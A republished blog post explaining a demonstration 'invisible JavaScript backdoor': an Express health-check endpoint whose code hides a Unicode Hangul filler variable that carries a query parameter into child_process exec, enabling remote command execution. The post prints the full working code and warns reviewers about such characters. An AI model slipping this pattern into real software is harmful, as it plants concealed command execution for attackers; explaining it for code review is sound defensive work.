The Invisible JavaScript Backdoor

Wolfgang Ettlinger carefull crafted this JavaScript snippet, which contains a backdoor. const express = require(‘express’); const util = require(‘util’); const exec = util.promisify(require(‘child_process’).exec); const app = express(); app.get(‘/network_health’, async (req, res) => { const { timeout,ㅤ} = req.query; const checkCommands = [ ‘ping -c 1 google.com’, ‘curl -s http://example.com/’,ㅤ ]; try { await Promise.all(checkCommands.map(cmd => …

Continue reading “The Invisible JavaScript Backdoor”


This content originally appeared on Bram.us and was authored by Bramus!

Wolfgang Ettlinger carefull crafted this JavaScript snippet, which contains a backdoor.

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

Looks pretty normal, right? Well, see that destructuring from req.query there (first highlight)? It contains an invisible character \u3164, which is a valid identifier for a JavaScript variable.

The character “ㅤ” (0x3164 in hex) is called “HANGUL FILLER” and belongs to the Unicode category “Letter, other”. As this character is considered to be a letter, it has the ID_Start property and can therefore appear in a JavaScript variable – perfect!

While that line appears normal to us, it actually reads:

const { timeout,\u3164} = req.query;

The result is that you pass something from the querystring’s \u3164 parameter into a JavaScript variable with the name \u3164. That hidden variable is also included in the checkCommands array (second highlight, after the ,), and thus will also be executed.

Let this be a reminder to never directly execute commands. Always check them. As Wolfgang also suggests:

Unicode should be kept in mind when doing reviews of code from unknown or untrusted contributors. This is especially interesting for open source projects as they might receive contributions from developers that are effectively anonymous.

The Invisible JavaScript Backdoor →

Via CSS-Tricks


This content originally appeared on Bram.us and was authored by Bramus!


Print Share Comment Cite Upload Translate Updates
APA

Bramus! | Sciencx (2021-12-10T16:29:45+00:00) The Invisible JavaScript Backdoor. Retrieved from https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/

MLA
" » The Invisible JavaScript Backdoor." Bramus! | Sciencx - Friday December 10, 2021, https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/
HARVARD
Bramus! | Sciencx Friday December 10, 2021 » The Invisible JavaScript Backdoor., viewed ,<https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/>
VANCOUVER
Bramus! | Sciencx - » The Invisible JavaScript Backdoor. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/
CHICAGO
" » The Invisible JavaScript Backdoor." Bramus! | Sciencx - Accessed . https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/
IEEE
" » The Invisible JavaScript Backdoor." Bramus! | Sciencx [Online]. Available: https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/. [Accessed: ]
rf:citation
» The Invisible JavaScript Backdoor | Bramus! | Sciencx | https://www.scien.cx/2021/12/10/the-invisible-javascript-backdoor-2/ |

Please log in to upload a file.



There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.

Related Posts